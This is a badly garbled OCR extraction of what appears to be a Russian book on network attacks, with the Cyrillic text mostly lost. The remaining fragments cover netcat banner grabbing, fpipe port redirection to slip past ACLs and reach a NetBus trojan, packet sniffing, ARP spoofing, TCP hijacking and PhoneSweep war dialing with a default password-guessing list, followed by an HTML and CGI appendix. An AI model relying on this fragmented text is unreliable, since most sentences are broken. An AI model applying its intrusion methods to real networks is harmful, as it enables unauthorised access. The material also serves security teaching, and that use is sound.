0 Resolve hostnames
0 Show host responses
Lookup
-Scan
Ping only
Every port in list
All selected ports in list
All list ports Irom
All potts from
110 Post Office Protocol-Vt

135 DCE endpoinl resolution
139 NETBIOS Session Service
143 Internet MessageAccess Protocol
143 hltps MCom
445 Microsoll-DS
1055
1092
3128 Squid Proxy
3123
Puc. 76.6. WinRouter Pro

,
1-1, netcat, , ..
, ,
. . 16.7 SMTP ( 25) ( 110) netcat.
j Command Prompt
C:\Test\netcat>nc - -n 1.0.0. 25
(UNKNOUN) [1.0.0.7] 25 (?) open
220 unspecified.host ESHTP - UinRoute Pro 4.1.30
quit
221 UinRoute Pro SMTP Service closing transmission channel
C:\Test\netcat>nc -u -n 1.0.0.7 110
(UNKNOUN) [1.0.0.7] 110 (?) open
+< IdinRoute Pro 4.1.30 POPS server ready <320.1046930623@unsp
quit
+OK UinRoute Pro POPS server signing off
:\Test\netcat>_
. 16.7.

-
, 9 10 .
16.
271
, WinRoute Pro
. , , , IDS (Intrusion Detecting System -
),
ICMP, WinRoute.

, traced
W2RK. ICMP-,
Sword-2000 , . 16.8.
=~ Command Prompt
C:S>tracert -h 1.0.0.1
Tracing route to SUORD-2QOO [1.0.0.11
ouei* a maximum of 5 hops:
1
3
4
5
1ms
1 me
1 m s flI.EX-1 [2.Q.Q.I]
' '
Request timed out.
*
Request timed out.
*
*
Request timed out.
*
Request timed out.
Trace complete.
Puc. 16.8. Sword-2000- !

, . 16.8,
1-1 ,
( ). ,
, - Sword-2000 - . - ,
Sword-2000. , . .
WinRoute Pro
1-1,
. 16.6, 3129 WinRoute Pro, - ,
. :
> (' , 1-3)
W i n R o u t e Pro
,
272
* * WinRoute Pro WinRoute Administration (Start

Programs * WinRoute Pro * WinRoute Administration). ,
. 16.9.
Open Configuration
> WinRoute Host ( WinRoute) IP-
WinRoute,
- 1.0.0.7.
-Configuration
Enler a hoslname of an IP address of a computer funning
WinRoute:
WinRoute Host:
localhosll
Username: [Admin
Password: \
W i n Route Username (
Cancel
OK
) Admin,
Puc. 16.9.
Password
()
WinRoute
.
> , - - ,
WinRoute
(. 16.10).
Action
View
Settingi
Window
Help
Puc. 16.10.
WinRoute Alex-1 !
- , ACL .
, -
, , .
[3] , ,
- . ,
WinRoute ( - ) -
.
16.
273
,
, - ! , ?
()
, .
Win Route Pro

,
, .
( ), ,
, . .
[3],
. , TCP-, .
,
. , .
, . , . NetBUS,
14. - , ,
, .
fpipe, foundstone_tools
(http://www.foundstonetools.com), ,
TCP UDP , ,
.
,
ACL
, .. ACL .
cnuckoB ACL
, ACL
, nmap (http://www.insecure.org/nmap),
274
, U N I X (
Windows NT/2000/XP -).
.
ICMP ( , D ).
, ICMP
TCP SYN . , ICMP;
, IP- .
, ICMP, ( ),
, ICMP,
, -
, .
nmap ( hping
(http://www.kyuzz.org/antirez), Unix), ,
, SuperScan
1-1 - . 16.5
FTP-. .
npomokoAa FTP
FTP
FTP TCP/IP .
FTP- FTP- TCP- (.. , TCP). , - .
FTP-
21.
.
. (.. ) ,
1023, , 20.
.

.
.
.
, TCP , - . FTP-
16.
275
FTP
, ,
.
, . ACL.
cnucku ACL
, ACL
,
. - , -
. . , TCP 1-1 FTP-
1024 , , .. . 16.11. Incoming | Outgoing |
Novell 2000 Adapter.
-ljl Realtek RTL8029(AS) Ethernet Adapt
| <f TCP Any host all ports -> Any host porbl 023
1
TCP Any host all ports > Any host all ports
Add..
*..
Remove
Puc. 16.11.
- !
, Alex- , , NetBUS,
Alex-, TCP-
NetBus 20034. , ACL. , FTP ,
.
276

- , 21,
fpipe 20034 , .
- ,
! , , - ,
Web- TCP- 80, - ,
, .
, ACL
, . , , .
ACL ,
, ACL. , .

, , [3],
,
.
( )
. . ,
.
, ,
, .
- . -,
ICMP,
, .
' ,
WinRoute'He . -, , .
. -,
- ,
, ACL - , , , .
17.

,
. , , TCP-,
, , , , . , Unix, , Unix [12]. Windows, , ,
-,
.
, ,
,
.

Ethernet ,
. Ethernet
- ,
,
. , , -
. ,
, (
).
- SpyNet, Web-. SpyNet
http://members.xoom.com/Iayrentiu2/, -
.
SpyNet - CaptureNet PipeNet. CaptureNet ,
Ethernet , .. Ethernet. PipeNet Ethernet , ,
, , HTTP (
Web-) .
278
, - SpyNet PipeNet HTTP, SpyNet . SpyNet

, - i SfA secret.txt -
Sword-2000 Alex-
This is a very big secret
Windows. 1-1
CaptureNet,
Ethernet. . 17.1
. 17.1.
secret.txt; - Notepad
Ethernet.
Ethernet .
> Alex- CaptureNet.
Capture Start ( *
) .
> Windows security.txt
Sword-2000 1-3.
> secret.txt Capture * Stop
( ) .
Ethernet CaptureNet (. 17.2), Ethernet, .
-ile
View
Capture
Help
XiFBTt
Pockets in buffer
Adopter: Reeltek
MA.C ad dres s
I5254AE
P address
[ggjj;
Capture
No.
BO
78
& PeepNetl
| T||| Fr... | Protocol
1.
61
1.
62
B4
65
66
67
1.
1.
1.
1.
1.
BO..
BO..
BO
BO..
BO..
BO..
BO..
80..
| Addr. IP src I Addr. IP E
IBM Nelbio
IBM Natbia
IBM Netb 0
HIM Netbio
IBM Nelbio
No IP Add...
No IP Add...
IBM Netbio
IBM Netbio
IBM Netbio
No IP Add...
No IP Add...
No P Add
No IP Add...
No IP Add...
No IP Add...
No
No
No
No
No
No
No
No
IP Ad
IP Ad
P Ad
IP Ad
IP Ad
IP Ad
IP Ad
IP Ad
13 Display capture
Filter
Hardware,Filter
Promiliscuous
00 00 00 00 00 1A 00
61 20 76 65 72 79 20 62 This is very bI
74
ig secret
P Directed
Puc. 17.2. Ethernet
17.
279
, , This is a very big secret (

).
, - , . CaptureNet ,
,
. ,
SpyNet.
,
. , , . , Windows ,
.

,
CaptureNet, , . SpyNet , , ,
.
tcpdump (http://www.tcpdump.org), .
, , AntiSniff (http://www.securitysoftwaretech.com/antisniff), , .
-
- .
,
IP-, . , , , , .
, ( . [2]),
AntiSniff.
, ,
- , , , .
. .
280
ARP

IP- IP-,
ARP (Address Resolution Protocol - ).
ARP D,
() IP- (-), . ,
ARP
.

IP-,
IP- . IP- .
- , ,
nbtstat W2RK.
- , ARP-
IP- - . , IP- - ; , IP- - .
- ARP . IP-
- , , , , .

- IP- . , , , arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) .
ARP [3], [4] [12],
, ARP .
UNIX ARP
,
, arpredirect. , Windows 2000/XP
, -, . , NTsecurity
(http://www.ntsecurity.nu) GrabitAII,
.
17.
281
GrabitAII ,
.

,
- -, , ,
ICMP- Redirect. Redirect , RFC-1122,
, , , .
Redirect , Redirect, Redirect
, .
, ,
, IP- ,
. , IP-,
IP- IP- ,
. ICMP Redirect , IP-
. , IP- .
(, ) ICMP Redirect, -
tracert ( Unix
tracerout). , , , ( . [12]).
( ) ,
, .
, , . ,
4 VPN (Virtual Private
Network - ).
, [7]
, PGP Desktop Security (http://www.pgp.com).
282
TCP-

TCP- (TCP hijacking), TCP- . , TCP TCP, .
TCP- , , , [3], Unix, Web
. , , , TCP- . (

http://www.cri.cz/-kra/index.html,
TCP- Hunt (Pavel Krauz)).
, , TCP-,
. TCP-
TCP- D ,
- TCP-?
, , , [12] [13].
TCP (Transmission Control Protocol - )
OSI, .
, , , .
TCP TCP/IP,
.
TCP- TCP- 32-
, , .
TCP-, . 6 ( ):
URG - ;
- ;
PSH - ;
RST - ;
17.
283
SYN - ;
FIN - .
TCP-.
1. TCP- , :
-> : SYN, ISSa
, SYN
(Synchronize sequence number - ),
32-
ISSa (Initial Sequence Number - ).
2.
, SYN . - ISSb;
ISSa,
, . ,
:
-> A: SYN, , ISSb, ACK(ISSa+1)
3.
, , :
; ISSa + 1;
ISSb + 1. TCP-
:
-> : , ISSa+1, ACK(ISSb+1)
4.

TCP-:
-> : , ISSa+1, ACK(ISSb+1); DATA
DATA .
TCP- , TCP- TCP-

32- - ISSa
ISSb. , ISSa
ISSb, TCP-.
,
ISSa ISSb TCP TCP-,
TCP-,
!
TCP- ,
FTP TELNET TCP, FTP TELNET- TCP.
284
, FTP TELNET IP- ,

FTP TELNET
IP- . FTP TELNET IP-, , , , -
.
, 32- ISSa
ISSb, TCP-.
. ,
, ISSa ISSb
. , ,
TCP ,
, , , TCP-.
,
.
ISSa ISSb .
.

ISSa ISSb.
TCP-
TCP-
rsh- Unix.

TCP
.
Unix . ( , r- ). TCP-, TCP- .
,
. [13], , , .
17.
285
, ,
. , .. ; ,
, TCP-.

.
, , .. .
, , ,
. - VPN .
PGP Desktop Security (
, , [7]).
18.
XakuHz
, , . , ,
, (
, ), - , , . ,
-
.
- , ,
.

, ,
, - ,
. -- -
- , ! , , - , , .
, , . , , - , ,
, .
- , -
Login Hacker, , THN-Scan (http://www.infowar.co.uk/thc/) ToneLock
Minor Threat&Mucho Maas.
, DOS,
.
, ( )

PhoneSweep
(http://www.sandstorm.com) Sandstorm. ,
18.
287
, ,
, . PhoneSweep,
- , Sandstorm.
- PhoneSweep , , .
, PhoneSweep, , , , - , . , , , ,
, , ,
. - , , ,
.
UcmoMHuku
- , . , ,
. , . Whols (, http://www.ripe.net). Whols , , , - .
- -
.
, ,
.
,
, . , ,
- ,
, .
- -
, -
288
, ,
.
.
, - . , PhoneSweep
,

(, ).
CkaHep PhoneSweep 4.4

PhoneSweep - , .
, - . -
Windows.
PhoneSweep . PhoneSweep .
Windows 95/98/NT/2000/XP.
.

/
(Point-to-Point protocol - ).
, 1 4.
I/ , .
PhoneSweep.
PhoneSweep 4.4
PhoneSweep Demo , -.
18.
289

(. 18.1).
This is a demonstration version of Sandstorm
Enterprises' PhoneSweep (tm) telephone
scanning application. The demonstration version
will NOT actually test computer system security
on telephone networks. It mey be used and
distributed freely, provided that neither the
program nor its components are modified, end
that Sandstorm's copyright remains intact.
End User License Agreement
Sandstorm Enterprises Inc. ("Sandstorm") and/or
its suppliers own these programs and their
documentation, which are protected under
applicable copyright laws. Your right to use the
programs end the documentation is limited to the
terms end conditions described below.
1. License: YOU MAY: (a) use the enclosed
programs on a single computer; (b) physically
transfer the programs from one computer to
another; (c) make a copy oi the programs for
I (Accept I j JTJecline | [Copy to Clipboard [
Load Profile
New
0 Current
Select From List
Puc. 18.1. PhoneSweep

Default ( ),
Current () I Accept ( ). PhoneSweep 4.4 Demo, . 18.2.
plPhoneSweep 4.4 Demo - localhost - DEFAULT
HHE
File View Help
>.
Start
Stop iRescani
fr
Save Revert Default
2;
Import Export
Report
ig?
Graph
Dist
What's this?
J V/,
Ehone Numbers | Results li Status |! History |j Setup
Prefix V 1 Number
1^555-00
%55S-1 0
^555-20
l|aU [Time
1 Modem
| Result
1 4| System ID
11
fc
Add
>?5
Delete
>
1
Idle
1.
"
"
SSS-lsl.i|[j
Puc. 18.2. PhoneSweep

10-1687
290
PhoneSweep 4.4 Demo

File (), View () Help (). ,
. , .
PhoneSweep 4.4 Demo
PhoneNumbers ( ), Results (), Status (),
History () Setup (). , .
PhoneSweep 4.4 Demo
.

(. ).
PhoneSweep 4.4 Demo , . , . , PhoneSweep
,
/ , ,
, ,
.
, PhoneSweep .

, (
).
Start (). ;
Start (), , . 18.3,
. ,
Default ,

Setup ().
18.
291
_1
PhoneSweep 4.4 Demo - localhost - DEFAULT

File View Help
Start Stop
Rescan
&
Seve Revert Default
&
Import Export Report Graph
> Start Now

Schedule Start.
itstoiy | Setup |
Cancel Scheduled Start
me
| Modem
| Result
&
Dist
What's this?
V-
j -0*| System ID
1I
Schedule Stop...
Add
Cancel Scheduled Stop

Delete
Idle
11 ~"ff~ !lty -"FF- I
. 18.3.
Stop (). .
Stop () ,
.
Rescan ( ).
, .
PhoneSweep Demo - New Profile (PhoneSweep Demo - ),
. 18.4.
Save (). , .
Revert ().
, , .
PhoneSweep 4.4 Demo - New Profile

Please enter a new profile name:
[DEFAULT
QK
Cancel
Puc. 18.4.

Default ( ). .
import ().
/ bruteforce.txt.
Export (). ( ),
.
-
292
Report (). , , .
Graph ().
( Excel 2000).
What's This? ( ). ,
PhoneSweep 4.4 Demo - .

PhoneSweep 4.4 Demo

(. 18.5) ,
.
PJIphoneSweop 4 4 Demo - localhost - DEFAULT
;ile View Help
>. % _
Start Stop Rescan
Sftv* Revsrt Default
&
Dist
v?
What's this?
V.
Phone Numbers j Results || Status | Histoty | Setup |

Profiles; [Modems | lime |. Effort j Dialing ] Remote |j Alerts j
This is demonstration profile tor PhoneSweep
4.Q Demo.
Click in this box to edit this note,
or click on "New" to create u new profile.
Open
New
Copy
6<
Delete
Save
Undo
*
Idle
1 -OFF- ip -BFF- 1
Puc. 18.5.
Profiles ()
, Profiles
(), Setup (), . 18.3.
Open (). .
Profiles () . 18.5.
New profile ( ). . Profiles () . 18.5.
18.
293
Copy profile ( ).
( ).
Profiles () . 18.5.
Delete (). .
Profiles () . 18.5.
Save (). ,
, . Profiles ()
. 18.5.
Undo (). . Profiles ()
. 18.5.
Freeze (). History
() .
Freeze () Thaw (). Freeze ()
History () . 18.6.
_ |n|x
IpflPhoneSweep 4.4 Demo - localhosl - DEFAULT

File View Help
>.
SJ
Start Stop Rescen
(5>
Save Revert Default
Dist
Phone Numbers || Results | Status

Time
(Modem
1
2003-03-20 11:47
1
2003-03-20 1 1 47
2003-03-2011:46
1
Idle
Wriat's this?
4%
tiistory
| Number
555-0003
555-20 4
555-2014
Setup
[Result
|-u|SystemD
Simulator
CARRIER
NG
ILE
TIMEOUT
User ID
Freeze
D
Clear
[j^
rjc^J^J^^J^|iSiBO
. 18.6. History ()

294
Thaw (). History ().

History () . 18.6.
Clear (). . History () Phone Numbers (
) . 18.6.
Add (). . Phone Numbers ( ) . 18.3. Clear () Add () Add Phone
Numbers ( ), - raPhoneSweep 4.4 Demo - Add P..
. 18.7 From: \
To:
Add ().
Note:
Delete ().
.
r-Dial
0 E usiness Outside
Weekend | All |
r-Dial
[ojach Time Period
Any Tirne Period
Add/Save (/).
1
1 OK 1

, Add Phone . 18.7.

Numbers ( ).
cmpoke
PhoneSweep
. ,
. ,
,
.
Sweeping Indicator ( ) - ,
.
Scheduled Start On/Off ( /) - ,
( ,
).
. Scheduled Start Time ( ) - OFF.
Scheduled Stop On/Off ( /) - ,
( ,
).
Scheduled Stop Time ( ) - OFF.
18.
295
Effort level ( ) - - ,
, .
Phonenumbers to Dial ( ) - , . , .
Report Status ( ) - ,
, ; - ;
- .
Time Period ( ) - - , , .
Remote Access Indicator ( ) - ,
PhoneSweep
. , .
-
PhoneSweep , .
PhoneSweep
PhoneSweep, .
> PhoneSweep Setup (), . 18.5 .
> Phone Numbers ( ),
. 18.2, , Add (), Add
Phone Numbers ( ), . 18.7,
.
> PhoneSweep Start ()
.
, ,
(dialing riles).

PhoneSweep , ,
.
PhoneSweep, , , , -
.
296
, PhoneSweep
.
fbpagok u
.
Add Phone Numbers ( ) (. 18.7)
: Business (), Outside (), Weekend
().
PhoneSweep ,
, , , .
Time (), Setup (), . 18.8.
PfjPhoneSweep 4.4 Demo - localhost - DEFAULT
File View Help
>.
Start Stop Rescen
&
Save Revert Delault
51
Dist
^?
What's this?
7%
I
I
I
Ehone Numbers | Besults li Status lUstory "I Setup
Profiles |j Modems | pmej [ Effort jl Pjaling | Remote | Alerts |
Time Period
Start Mrs Minutes End Hrs Minutes
Business Hours: | 09 E 00 |16 EH
Blackout Hours: |00 [] 00 [3 [00
Weekends: Monday TuesdayD WednesdayD ThursdayQ Friday

0
Saturdays
Sunday
Import Time Periods: El Business^ OutsidelZ Weekend

Delay Between Calls |5
3 Seconds
Time Period Rings

Business:
4
'
Outside:
Weekend:
Idle
10
'
Seconds
or [50
[~_
or [92
or
]
[92
|
[
OS -BFF- IL3 -BFF- ^111
. 18.8.

Business Hours ( ) Blackout Hours ( )
, , , , .
Weekends () ( ). Import Time
Period ( ) , .
18.
297
Time () Rings
() Seconds (), , , , .
Business ( ), Outside ( ) Weekend
(). , . 18.8 , 10 , 92 .
, Time ()
, .
?
- Effort ().
Hacmpouka
Effort () . 18.9.
tTlphoneSweep 4.4 Demo - localhost - DEFAULT
File View Help

>.
Start Stop Rescan
Save
Revert
Default
Impo 1 Export Report Graph
Hill
Phone Numbej'SjI^Besults | Status \\ tiistory
Setup
Dist
What's this?
1%
~i
i Time [ Effort 1 Djaling :" Rem Qte |f Alerts |
Profiles p Modems
Current Effort Level:
Connect
Connectto answering phone numbers

then disconnect immediately.
Set Level:
Connect
Scan For:
vlodems Only
Username
Penetrate Level Options:
|Pas sword
Lj
Maximum Guesses Per Username Per Day: Unlimited

Maximum Calls Per Number Per Day:
0 Recycle Names
0 Find Modems First
Idle
Unlimited J root
root
guess
toor
syzygy
123
H|Add||Del|
pi
11 ...-BFF- ita .-.-..]|11

. 18.9.
. 18.9, ,
. Set Level ( ) ,
( Connect ()),
( Identity
()), (
Penetrate ()). Scan For () / ,
(, , , ?).
298
Penetrate Level Options ( )

, ..
. Maximum Guesses Per Username Per Day ( )
() . , ,
- . ,
, Maximum Calls Per
Number Per Day ( ).
/, ,
bruteforce.txt,
Effort (), . 18.9. , Add () Del ().
/
Recycle Names ( ). Recycle Names (
) PhoneSweep
/ ,
/.
, Find Modems First ( ) PhoneSweep
.
.
PhoneSweep , /. .
bruteforce.txt: /,
PhoneSweep . brutecreate.exe,
/ bruteforce.txt.
systemdefault.txt: /,
.
( )
bruteforce.txt.
largebrute.txt: ,
.i
largebruteback.txt: ,
largebrute.txt, .
18.
299
, PhoneSweep ,
. - ! , ,
, PhoneSweep 1000$, ,
2800$ 2002 , - PhoneSweep . ! - , , -
, PhoneSweep - ,
, .
- THN-Scan ToneLock
,
. , - Login Hacker (
, , [3]). ,
, ...
- - .
, ,
TeleSweep
Secure
(http://www.securelogix.com) Secure Logix.OdnaKO,
[14], TeleSweep Secure - , .
, , - .
-
.
, , , - ,
.
PhoneSweep -
, ,
, , . PhoneSweep
, , - .

, , , .
HTML u DHTML
Web-,
HTML - ,
. , , , ( tag - ) HTML, , ,
.
, HTML . - HTML Web. ,
Web- - , - Web , , .
Web Web ,
, - ,
.
,
Web. HTML.

HTML
, HTML ,
. HTML,
.
, HTML ,
HTML, . .1 HTML.
. HTML
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"
"http://www.w3.org/TR/REC-html40/strict.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" content="text/html";

CHARSET="windows-1252">
301
< http-equiv="Content-Language" content="ru">

< NAME="keywords" =", HTML">
< NAME="description" =" HTML">
<1> HTML</TITLE>
</HEAD>
<BODY>
<> HTML-
</BODY>
</HTML>
. . 1 HTML . 1 IE 5.
]
. . 1. HTML- IE 5
HTML . , HTML.

<JDOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"

HTML - , HTML 4. , - EN ().
HTML 4 , , , HTML . <HTML> , HTML,
.
Cmpykmypa goky/ HTML

, HTML . , . HTML,
, .
HTML, .
, <HEAD>.
, .
<BODY>
<FRAMESET>, Web- - -
302
, .
,
,
Web HTML. .
- ,
HTML .
, HTML, (, , ) .
, , ,
(, , ) , . HTML , .. (. ), <SCRIPT>.

- ,
. , HTML,
.. , , .
HTML <OBJECT> <APPLET>
( W3C HTML).
HTML, ,
<IFRAME>,
HTML. <IFRAME> , , ,
IE 5
<IFRAME> .
<SCRIPT>, <OBJECT> <IFRAME>.
HTML
.1, (, HTML),
. - </HTML>, . , , - .
, <> .
, , .
, , , ; .
<>, , , , .
303
- , ,
<HEAD> <>. , , . , <HTML LANG="ru" DIR="LTR"> LANG, HTML ( "ru" ), DIR, ,
"LTR" - (, ).
HTML :
<_ _> </_>
, HTML. HTML 4
( http://www.w3.org)
, ,
.
>
, HTML HTML
, , Web. HTML 4
<OBJECT>,
HTML
- <APPLET>, <IMG>,
<EMBED> .
<OBJECT> , .
ID - .
CLASSID - , . , CLASSID URL - , - DATA (. ).
CODEBASE - ,
(, CLASSID, DATA
ARCHIVE). CODEBASE , URL .
CODETYPE - , , CLASSID. , ,
"text/html", "image/gif", "video/mpeg", "text/javascript", , , HTML, GIF, MPEG JavaScript.
DATA - . ,
, DATA . URL, , CODEBASE.
304
TYPE - , DATA.
ARCHIVE - URL
, , ,
CLASSID DATA.

, ,
.GIF, , .
, , . <OBJECT> HTML - , , HTML. .2
HTML <OBJECT>, - Microsoft Media Player.
.2. HTML
<HTML>
<HEAD>
<1> <OBJECTx/TITLE>
</HEAD>
<BODY>
3BJECT
ID="WinPlayer"
CLASSID="clsid:22D6F312-BOF6-llDO-94AB0080C74C7E95">
</OBJECT>
</BODY>
</HTML>
</HTML>
To, IE 5 .2,
. .2.
^ <O8JECT> ...
'

| \
jj ||
. .2. - Windows Media Player
305
.2 CLASSID ,
DBJECTX
CLSID, Windows ,
,
Microsoft.
CLSID , OLE (Object Linking and Embedding - ). OLE - - Microsoft, . OLE , , , Windows. OLE , , , ActiveX.
OLE
.
, , , <OBJECT> , , . , Web,
, - <IFRAME>.
Te2<IFRAME>
HTML HTML
Web; ( frame , ). , , .
Web- HTML ,
, .
<IFRAME>
HTML. . HTML
<IFRAME>, , .
.. HTML
<HTML>
<HEAD>
<1> </1>
306
</HEAD>
<BODY>

Opel.
<IFRAME SRC="specification.html" WIDTH="250" HEIGHT="16"
SCROLLING="autO" FRAMEBORDER="1" >
</IFRAME>
.
</BODY>
</HTML>
HTML . IE 5
. ..
J - Microsoft Internet Explorer ...
]
'
(3 | &

Opel. |
I
- Oft!
. .. HTML
<IFRAME>, , , , , <IFRAME>
,
. .
HTML
HTML ,
, ,
. , HTML. HTML
<Form>, - <Script>. .
<Form>
.4 HTML , . IE 5 . .4.
.4. Web
<HTML>
<HEAD>
<1> </1>
307
</HEAD>
<BODY>
<> </>
<FORM
METHOD="post">
ACTION="http: //www.anysite.com/prog/addsubs"
<INPUT TYPE="text" ID="firstname">

<LABEL FOR="firstname">MMa: </LABEL><BR>
<INPUT TYPE="text" ID="lastname">
<LABEL ="18">: </LABEL><BR>
<INPUT TYPE="text" NAME="postal-address" ID="email">
<LABEL FOR="email">e-mail </LABEL><BR>
<INPUT TYPE="checkbox" NAME="subscribe">
HOBOCTeu<BR>
<INPUT
TYPE="submit"
VALUE="OTnpaBHTb">
<INPUT
TYPE="reset">
</FORM>
</BODY>
</HTML>
.4. FORM, - LABEL INPUT.

LABEL -
. ,
Windows
(. . .4).
HTML
File Edit View Favorites Tools H
INPUT TYPE, "text". TYPE ,

INPUT, :
- .
:
TYPE .4, ,
e-mail
"checkbox", "submit" "reset", D
, , | || Reset |
, fr My Computer
.
,
. .4.
, , Windows.
06pa6omka
, .4.
Web- ,
, , , . -
308
() ,
. , , ,
. HTML URL, ACTION FORM, ,
, .4:
<FORM ACTION="http://www.anysite.com/prog/addsubs" METHOD="post">
, addsubs, /prog http://www.anysite.com. , ,

. .
METOD FORM. post, , - get ( ).
CGI (Common Gateway Interface - ), ,
(.
). , ,
CGI, ,
.
CGI .
1=1&2=2&...
- ( ), - (.. ). ,
, , METHOD . REQUEST_METHOD (. ).
GET URL
QUERY_STRING (. ).
POST
. ,
, CONTENT_LENGTH,
. CONTENT_TYPE.

CONTENT LENGTH.
309
.
.4. POST (
FORM METHOD "post") - 42 , :
postal-address=ivan@email.com&subscribe=on
CONTENT_LENGTH 42,
. CONTENT_TYPE "application/x-www-form-urlencoded".
"",
.

. (, ).
, . Web-,
, , HTML,
HTML , ,
CGI, HTML . Web, .
Te 2 <SCRIPT>
<SCRIPT> HTML , ,
Web-, , - Web.
,
HTML, .
HTML ,
HTML, ,
, , Windows.
, , HTML, .
, . HTML <SCRIPT>, .
, HTML. HTML
HTML ,
.
310
, ,
, .
<SCRIPT> HTML,
, <HEAD>,
, <BODY>,
. <SCRIPT>.
SRC - URL -, .. ,
, Web.
TYPE -
<SCRIPT>. , "text/javascript"
JavaScript.
<SCRIPT> .
SRC , <SCRIPT> . SRC URL, <SCRIPT>
, URL.

- , .
.
, JavaScript,
write () .
document.write (", !")
</SCRIPT>
, HTML
, <Script>.
HTML.
, ,
, .

, - , , , .
, HTML- HTML-, . HTML ,
311
HTML. ,
, . .
<AHREF="http://www.anysite.com/index.html"
1
onMouseOver="window.status='U4enKHH , ! ; return
1;"> </>
:
1
window.status='U|enKHH , ! ;
return true;
( window)
.
. HTML
.
ONLOAD ,
FRAMESET.
BODY FRAMESET.
ONUNLOAD ,
. BODY FRAMESET.
ONCLICK
.
.
ONDBLCLICK
.
.
ONMOUSEDOWN .
.
ONMOUSEUP .
.
ONMOUSEOVER . .
ONMOUSEMOVE , .
.
312
ONMOUSEOUT
.
.
ONFOCUS
.
: LABEL, INPUT, SELECT,
TEXTAREA BUTTON.
ONBLUR .
, ONFOCUS.
ONKEYPRESS , . .
ONKEYDOWN ,
. .
ONKEYUP ,
.
.
ONSUBMIT . FORM.
ONRESET .
FORM.
ONSELECT
.
INPUT TEXTAREA.
ONCHANGE
, .
: INPUT, SELECT
TEXTAREA.

. .
,
.
.
, HTML,
INPUT, SELECT, BUTTON, TEXTAREA LABEL, -
313
. ,
HTML . , ,
, .
, HTML .

.5
JavaScript, ,
, ,
.
.5. Web
<HTML>
<HEAD>
<1> </1>
function checkPas sword (Password) {
if (Password != "007" ) {
alert ( " ! " ) ;
return 0;
}
else {
alert ("!") ;
return 1 ;
function welcome ( ) {
document .write ( ", ! " )
}
</SCRIPT>
</HEAD>
<BODY>
<BR>
<INPUT TYPE="text" NAME="name" ONCHANGE="if ( ! checkPas sword
(this. value) ) { this. focus ( ) /this. select ( ) ; } else { welcome()}" VALUE="">
</BODY>
</HTML>
314
. .5 IE 5.
' .
File
Edit
View
Favorites
4. Back > * " <Q Bl <a | "|| Links"

j My Computer
Puc. A. 5.
(. .6)
window.document.myform.mybutton.onclick = my_onclick.
.6.
<HTML>
<HEAD>
<11|> </1>
</HEAD>
<BODY>
<FORM NAME="myform">
<INPUT TYPE="button" NAME="mybutton" VALUE=" ">
</FORM>
function my_onclick() {
alert(", !")
>
window.document.myform.mybutton.onclick = my_onclick
</SCRIPT>
</BODY>
</HTML>
.
npomokoA C6I
HTML 4,
. - ,
. , ,
- .
.
1. HTML
.
2.
- , , .. - .
3. , HTML 4
, URL, ACTION
Web
.
HTTP,
.
4. URL,
, .
5. , ,
, .
6. (
), ,
.
- .Web,
; ,
HTTP 1.1, .
CGI (Common Gateway Interface - ).
,
NCSA (National Center for Supercomputing Applications -
)
, Web.
7.
,
, METHOD
FORM. HTML 4 - POST
GET, HTTP.
8. ( ) ,
, .
316
9.
.

Web (
).
10. , ,
( )
.
11. .
,
,
- Web.
HTML 4, ,
.
HTTP,
Web.
CGI, Web-
.
.

(,
) ,
.
1. , .. ,
. ,
,
.
2.
, /.
.
3.
,
ENCTYPE FORM.
HTTP
, - .
, ,

.
317

- ,
, .
;
.
FORM
.
.
,
.
SELECT, OPTION.
SELECT .

.

.
.
,
NAME, .
, OBJECT
.

, . ,

OBJECT, DECLARE.
, ,
. , .
<FORM ACTION="http: //www.anysite.com/prog/an.yprog" METHOD="post">
<INPUT TYPE=ntextn STYLE="display:none" NAME="hide-text"

VALUE= "myname " >
</FORM>
"myname"
"hide-text" /
.
318 _

ENCTYPE FORM,
, .
,
.
Tun "application/x-www-form-urlencoded"
. ,
,
.
,
+. ,
, %,
, ASCII .
CRLF (.. %OD%OA).
/
. =,
/ &.
, , .
<FORM ACTION="http://www. anysite.com/prog/addsubs" METHOD="post ll >
<INPUT TYPE="text" 1=
<LABEL FOR="firstname">HMH: </LABELXBR>
< INPUT TYPE="text" ID= 1I lastname">
<LABEL FOR="lastname"><l>aMwiHH: </LABELxBR><INPUT TYPE="text" NAME="postal-address" lD="email">
<LABEL FOR="email">e-mail </LABELxBR>
<INPUT TYPE=" checkbox" NAME=" subscribe ">
HOBOCTeu<BR>
<INPUT TYPE=" submit" VALUE=" "> <INPUT TYPE=" reset ">
</FORM>
Ivan Petrov
petrov@email.com
:
firstname=lvan&lastname=Petrov&postaladdress=petrov @ email. com&subscribe=on
319
Tun "multipart/form-data"
"application/x-www-form-urlencoded"
,
, ASCII. ,
, ASCII,
, "multipart/form-data".
"multipart/form-data"
,
.
,
HTML.
"Content - ", "text /plain".
, .
"Content-Disposition", "form- data".
.
, "control-name" :
Content-Disposition:
form-data;
name =" control -name"
, ,
(,
"application/octet-stream").
,
"multipart/mixed".
"multipart /form- data". ,
.
<FORM ACTION "http://www.anysite.com/cgi-bin/handler"
ENCTYPE= "multipart /form-data" METHOD="post">
<>
<INPUT TYPE="text" NAME="name_of_sender"><BR>
<>
< INPUT TYPE="file" NAME="name_of_f iles">
<HR>
<INPUT TYPE=" submit" VALUE=" "> <INPUT TYPE="reset">
</FORM>
"ivanov"
"content.txt",
.
320
Content-Type: multipart/form-data; boundary=STRING_SEPARATOR

--STRING_SEPARATOR
Content-Disposition: form-data; name="name_of_sender11
Ivanov
--STRING_SEPARATOR
Content-Disposition: form-data; name="name_of_files";
filename="content.txt"
Content-Type: text/plain
. . . content.txt . . .
--STRING_SEPARATOR--
boundary, ,
.
"logo.gif",
.
Content-Type: multipart/form-data; ^=_
--_-Content-Disposition:
form-data; name="name_of_sender"
Ivanov
--_-Content-Disposition: form-data; name="name_of_files"
Content-Type: multipart/mixed; 1=_
--_-Content-Disposition: attachment; filenames"content.txt"
Content-Type: text/plain
. . . content.txt . . .
--_
Content-Disposition: attachment; filename="logo.gif"
Content-Type: image/gif
Content-Transfer-Encoding: binary
... l o g o . g i f . . .
_-_--
, , ,
- .
, .

HTML 4
HTTP
( HTTP).
HTTP ,
, HTTP ,
, HTTP
321
, , .
,
.
= SP __ SP
__ CRLF
SP - ASCII ( 32), -
HTTP, ,
URL, a CRLF - (CR) (LF).
HTTP ,
, HTML 4.
GET - ,
, URL .
.
POST , ,
,
URL .
